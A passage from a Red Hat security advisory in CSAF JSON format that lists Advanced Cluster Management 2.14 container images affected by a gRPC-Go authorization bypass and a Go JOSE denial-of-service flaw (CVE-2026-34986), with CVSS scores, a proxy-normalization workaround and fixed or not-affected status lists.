"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
},
{
"cve": "CVE-2026-34986",
"cwe": {
"id": "CWE-131",
"name": "Incorrect Calculation of Buffer Size"
},
"discovery_date": "2026-04-06T17:01:34.639203+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2455470"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
